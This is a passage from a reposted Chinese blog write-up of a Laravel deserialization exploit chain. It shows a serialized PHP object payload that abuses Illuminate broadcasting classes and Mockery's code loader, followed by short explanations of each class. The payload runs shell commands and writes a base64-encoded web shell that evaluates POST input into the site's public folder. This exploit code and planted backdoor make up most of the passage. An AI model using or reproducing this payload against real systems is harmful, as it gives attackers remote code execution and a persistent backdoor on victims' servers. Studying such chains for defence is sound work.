  13.         s:8:"*event";
  14.         O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{
  15.                 s:10:"connection";
  16.                 O:32:"Mockery\Generator\MockDefinition":2:{
  17.                         s:9:"*config";
  18.                         O:35:"Mockery\Generator\MockConfiguration":1:{
  19.                                 s:7:"*name";
  20.                                 s:7:"abcdefg";
  21.                         }
  22.                         s:7:"*code";
  23.                         s:254:"<?php $c='echo PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+| base64 -d > /Host/laravel/public/server.php';system($c);exec($c);shell_exec($c);eval('file_put_contents("/Host/laravel/public/s.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+"));'); exit; ?>";
  24.                 }
  25.         }
  26. }
  27. Illuminate\Broadcasting\PendingBroadcast 类是一个用于定义和管理广播事件(BroadcastEvent)的类。通过构造函数传递的事件对象来定义要广播的事件。
  28. Illuminate\Bus\Dispatcher 类是 Laravel 中的命令总线(Command Bus)实现的类。这个类负责接收和分发待处理的广播事件到相应的广播者(Broadcast Event)。
  29. Mockery\Loader\EvalLoader 类是 Laravel 测试框架所使用的一个库。这个类负责加载 ‘Mockery’ 库的一些定义以及动态地生成测试用的模拟对象。
  30. Illuminate\Broadcasting\BroadcastEvent 类是一个实现了广播事件接口的类。它定义了广播事件的属性和行为,例如连接名称等。
  31. Mockery\Generator\MockDefinition 类是一个用于定义和配置模拟对象的类。它包含了模拟对象的代码和配置信息。
  32. Mockery\Generator\MockConfiguration 类是 Mockery 库用于生成模拟对象时的配置类。它定义了模拟对象的名称等配置信息。
复制代码
来源:https://www.cnblogs.com/phpphp/p/17845369.html
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!

举报 回复 使用道具